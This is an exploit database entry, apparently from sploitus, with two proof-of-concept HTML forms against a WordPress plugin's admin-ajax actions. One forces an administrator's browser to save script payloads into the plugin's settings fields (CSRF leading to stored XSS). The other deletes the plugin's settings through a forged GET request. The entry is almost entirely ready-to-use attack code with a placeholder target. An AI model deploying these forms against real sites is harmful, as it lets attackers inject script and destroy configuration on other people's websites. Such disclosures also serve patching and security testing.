## https://sploitus.com/exploit?id=WPEX-ID:169D21FC-D191-46FF-82E8-9AC887AED8A4
CSRF to XSS
```html
<html>
  <body>
    <!-- Cross-site form that POSTs script payloads to the save_fbe_settings AJAX action -->
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="save_fbe_settings" />
      <input type="hidden" name="pixelId" value="<script>alert(0)</script>" />
      <input type="hidden" name="accessToken" value="<script>alert(0)</script>" />
      <input type="hidden" name="externalBusinessId" value="<script>alert(0)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

CSRF to delete settings
```html
<html>
  <body>
    <!-- No method attribute, so the browser submits this form as a GET request -->
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="delete_fbe_settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```